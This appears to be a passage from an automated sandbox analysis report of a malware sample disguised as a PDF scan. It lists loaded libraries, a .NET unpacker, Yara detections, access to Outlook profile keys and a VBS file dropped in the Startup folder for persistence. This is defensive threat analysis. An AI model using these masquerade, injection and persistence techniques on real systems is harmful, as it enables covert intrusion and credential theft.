                      Source: C:\Users\user\AppData\Roaming\Guid.exeSection loaded: schannel.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Guid.exeSection loaded: mskeyprotect.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Guid.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Guid.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Guid.exeSection loaded: ncryptsslp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Guid.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Guid.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Guid.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Guid.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: vaultcli.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasapi32.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasman.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rtutils.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: schannel.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mskeyprotect.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ncryptsslp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\rScan_0984829339_PDF.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                      Source: C:\Users\user\Desktop\rScan_0984829339_PDF.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\ProfilesJump to behavior
                      Source: rScan_0984829339_PDF.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                      Source: rScan_0984829339_PDF.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: rScan_0984829339_PDF.exe, 00000000.00000002.2280814775.0000000003DD5000.00000004.00000800.00020000.00000000.sdmp, rScan_0984829339_PDF.exe, 00000000.00000002.2280814775.0000000003D08000.00000004.00000800.00020000.00000000.sdmp, rScan_0984829339_PDF.exe, 00000000.00000002.2282883886.0000000005AB0000.00000004.08000000.00040000.00000000.sdmp, rScan_0984829339_PDF.exe, 00000000.00000002.2262633916.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp, Guid.exe, 00000005.00000002.2451764397.0000000003306000.00000004.00000800.00020000.00000000.sdmp, Guid.exe, 00000005.00000002.2482319443.0000000004030000.00000004.00000800.00020000.00000000.sdmp, Guid.exe, 00000005.00000002.2482319443.0000000003F78000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: rScan_0984829339_PDF.exe, rScan_0984829339_PDF.exe, 00000000.00000002.2280814775.0000000003DD5000.00000004.00000800.00020000.00000000.sdmp, rScan_0984829339_PDF.exe, 00000000.00000002.2280814775.0000000003D08000.00000004.00000800.00020000.00000000.sdmp, rScan_0984829339_PDF.exe, 00000000.00000002.2282883886.0000000005AB0000.00000004.08000000.00040000.00000000.sdmp, rScan_0984829339_PDF.exe, 00000000.00000002.2262633916.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp, Guid.exe, 00000005.00000002.2451764397.0000000003306000.00000004.00000800.00020000.00000000.sdmp, Guid.exe, 00000005.00000002.2482319443.0000000004030000.00000004.00000800.00020000.00000000.sdmp, Guid.exe, 00000005.00000002.2482319443.0000000003F78000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: protobuf-net.pdbSHA256}Lq source: rScan_0984829339_PDF.exe, 00000000.00000002.2284754517.0000000006850000.00000004.08000000.00040000.00000000.sdmp, Guid.exe, 00000005.00000002.2482319443.000000000441E000.00000004.00000800.00020000.00000000.sdmp, Guid.exe, 00000005.00000002.2482319443.0000000004164000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: protobuf-net.pdb source: rScan_0984829339_PDF.exe, 00000000.00000002.2284754517.0000000006850000.00000004.08000000.00040000.00000000.sdmp, Guid.exe, 00000005.00000002.2482319443.000000000441E000.00000004.00000800.00020000.00000000.sdmp, Guid.exe, 00000005.00000002.2482319443.0000000004164000.00000004.00000800.00020000.00000000.sdmp

                      Data Obfuscation

                      barindex
                      .NET source code contains potential unpacker
                      Source: rScan_0984829339_PDF.exe, Shvnzxplak.cs.Net Code: Bhycju System.AppDomain.Load(byte[])
                      Source: Guid.exe.0.dr, Shvnzxplak.cs.Net Code: Bhycju System.AppDomain.Load(byte[])
                      Source: 0.2.rScan_0984829339_PDF.exe.3dd57f8.5.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
                      Source: 0.2.rScan_0984829339_PDF.exe.3dd57f8.5.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
                      Source: 0.2.rScan_0984829339_PDF.exe.3dd57f8.5.raw.unpack, XmlSerializationHelper.cs.Net Code: ReadObjectProperties
                      Source: 0.2.rScan_0984829339_PDF.exe.6850000.8.raw.unpack, TypeModel.cs.Net Code: TryDeserializeList
                      Source: 0.2.rScan_0984829339_PDF.exe.6850000.8.raw.unpack, ListDecorator.cs.Net Code: Read
                      Source: 0.2.rScan_0984829339_PDF.exe.6850000.8.raw.unpack, TypeSerializer.cs.Net Code: CreateInstance
                      Source: 0.2.rScan_0984829339_PDF.exe.6850000.8.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateInstance
                      Source: 0.2.rScan_0984829339_PDF.exe.6850000.8.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateIfNull
                      Source: 0.2.rScan_0984829339_PDF.exe.5ab0000.6.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
                      Source: 0.2.rScan_0984829339_PDF.exe.5ab0000.6.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
                      Source: 0.2.rScan_0984829339_PDF.exe.5ab0000.6.raw.unpack, XmlSerializationHelper.cs.Net Code: ReadObjectProperties
                      Source: 0.2.rScan_0984829339_PDF.exe.3e24018.2.raw.unpack, Shvnzxplak.cs.Net Code: Bhycju System.AppDomain.Load(byte[])
                      Yara detected Costura Assembly Loader
                      Source: Yara matchFile source: 0.2.rScan_0984829339_PDF.exe.6920000.9.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.Guid.exe.43405e8.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.Guid.exe.424e9c8.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.Guid.exe.424e9c8.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.2262633916.0000000002DA7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2284941068.0000000006920000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.2451764397.0000000003018000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.2482319443.0000000004164000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: rScan_0984829339_PDF.exe PID: 6272, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Guid.exe PID: 5588, type: MEMORYSTR
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_066BFAF3 push es; ret 2_2_066BFAF4
                      Source: C:\Users\user\AppData\Roaming\Guid.exeCode function: 5_2_015A070D pushad ; ret 5_2_015A070E
                      Source: C:\Users\user\AppData\Roaming\Guid.exeCode function: 5_2_06076636 push ebp; retf 5_2_06076644
                      Source: C:\Users\user\AppData\Roaming\Guid.exeCode function: 5_2_06073FED push es; retf 5_2_06074030
                      Source: C:\Users\user\AppData\Roaming\Guid.exeCode function: 5_2_06073FED push es; retf 5_2_06074054
                      Source: C:\Users\user\AppData\Roaming\Guid.exeCode function: 5_2_06076AB0 push esp; retf 5_2_06076ABD
                      Source: C:\Users\user\AppData\Roaming\Guid.exeCode function: 5_2_06074B82 push es; iretd 5_2_06074BB4
                      Source: C:\Users\user\AppData\Roaming\Guid.exeCode function: 5_2_06074B82 push es; retf 5_2_06074BF8
                      Source: C:\Users\user\AppData\Roaming\Guid.exeCode function: 5_2_06074BB5 push es; retf 5_2_06074BF8
                      Source: C:\Users\user\AppData\Roaming\Guid.exeCode function: 5_2_060753CF push ecx; iretd 5_2_060753D0
                      Source: C:\Users\user\AppData\Roaming\Guid.exeCode function: 5_2_06074031 push es; retf 5_2_06074054
                      Source: C:\Users\user\AppData\Roaming\Guid.exeCode function: 5_2_07681A22 push ss; ret 5_2_07681A23
                      Source: C:\Users\user\AppData\Roaming\Guid.exeCode function: 5_2_07681AC4 push ss; ret 5_2_07681AC5
                      Source: C:\Users\user\AppData\Roaming\Guid.exeCode function: 5_2_07682575 push cs; ret 5_2_07682576
                      Source: C:\Users\user\AppData\Roaming\Guid.exeCode function: 5_2_076825FD push cs; ret 5_2_07682604
                      Source: C:\Users\user\AppData\Roaming\Guid.exeCode function: 5_2_076815F4 push ds; ret 5_2_076815FA
                      Source: C:\Users\user\AppData\Roaming\Guid.exeCode function: 5_2_076815C2 push ds; ret 5_2_076815C8
                      Source: C:\Users\user\Desktop\rScan_0984829339_PDF.exeFile created: C:\Users\user\AppData\Roaming\Guid.exeJump to dropped file

                      Boot Survival

                      barindex
                      Drops VBS files to the startup folder
                      Source: C:\Users\user\Desktop\rScan_0984829339_PDF.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Guid.vbsJump to dropped file
                      Source: C:\Users\user\Desktop\rScan_0984829339_PDF.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Guid.vbsJump to behavior
                      Source: C:\Users\user\Desktop\rScan_0984829339_PDF.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Guid.vbsJump to behavior
                      Source: C:\Users\user\Desktop\rScan_0984829339_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\rScan_0984829339_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\rScan_0984829339_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\rScan_0984829339_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\rScan_0984829339_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\rScan_0984829339_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\rScan_0984829339_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\rScan_0984829339_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\rScan_0984829339_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\rScan_0984829339_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\rScan_0984829339_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\rScan_0984829339_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\rScan_0984829339_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\rScan_0984829339_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\rScan_0984829339_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\rScan_0984829339_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\rScan_0984829339_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\rScan_0984829339_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\rScan_0984829339_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\rScan_0984829339_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\rScan_0984829339_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\rScan_0984829339_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\rScan_0984829339_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\rScan_0984829339_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\rScan_0984829339_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\rScan_0984829339_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\rScan_0984829339_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\rScan_0984829339_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\rScan_0984829339_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\rScan_0984829339_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\rScan_0984829339_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\rScan_0984829339_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\rScan_0984829339_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\rScan_0984829339_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\rScan_0984829339_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\rScan_0984829339_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\rScan_0984829339_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\rScan_0984829339_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\rScan_0984829339_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\rScan_0984829339_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\rScan_0984829339_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\rScan_0984829339_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\rScan_0984829339_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\rScan_0984829339_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\rScan_0984829339_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\rScan_0984829339_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\rScan_0984829339_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\rScan_0984829339_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\rScan_0984829339_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\rScan_0984829339_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\rScan_0984829339_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\rScan_0984829339_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\rScan_0984829339_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\rScan_0984829339_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\rScan_0984829339_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\rScan_0984829339_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
